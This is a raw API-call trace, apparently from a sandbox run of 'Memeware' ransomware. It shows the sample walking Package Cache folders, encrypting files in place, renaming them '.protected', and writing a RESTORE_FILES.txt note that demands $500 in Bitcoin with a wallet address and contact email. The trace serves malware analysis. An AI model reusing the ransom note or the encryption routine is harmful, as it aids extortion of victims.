[0074.196] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.196] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned 92 [0074.196] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.196] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.196] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*") returned 94 [0074.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.197] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.197] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.197] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.197] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.197] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.197] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\.") returned 94 [0074.197] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.197] 
FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.197] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.197] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.197] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.197] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.197] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.197] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\..") returned 95 [0074.197] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.197] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.197] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Windows") returned -1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files") returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files (x86)") returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$Recycle.bin") returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="System Volume Information") returned 1 [0074.197] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned 116 [0074.198] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0074.198] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0074.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*") returned 118 [0074.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.198] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.198] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.198] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.198] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.198] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\.") returned 118 [0074.198] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.198] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\..") returned 119 [0074.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.199] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 
| out: lpFindFileData=0x295ecb0) returned 1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.199] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.199] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.200] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.200] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.200] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.200] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.200] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.200] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.200] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.202] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.202] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.202] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.202] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.204] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.204] CloseHandle (hObject=0xd8) returned 1 [0074.214] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 135 [0074.214] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.protected")) returned 1 [0074.214] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Windows") returned -1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files") returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files (x86)") returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$Recycle.bin") returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="System Volume Information") returned 1 [0074.214] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.214] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".protected") returned 0x0 [0074.214] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.214] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.215] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.215] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 [0074.215] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.215] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".rar") returned 0x0 [0074.215] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.215] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".zip") returned 0x0 [0074.215] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.231] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.232] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, 
lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.233] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.233] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.233] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.233] CloseHandle (hObject=0xd8) returned 1 [0074.234] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 155 [0074.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.protected")) returned 1 [0074.235] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.235] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 134 [0074.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.245] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.245] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.246] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.246] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0074.246] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.246] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.246] CloseHandle (hObject=0xd4) returned 1 [0074.247] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.247] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.247] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0074.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.248] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.248] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.249] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.249] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.249] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.249] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0074.249] CloseHandle (hObject=0xb4) returned 1 [0074.249] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.249] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.250] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0074.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.250] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 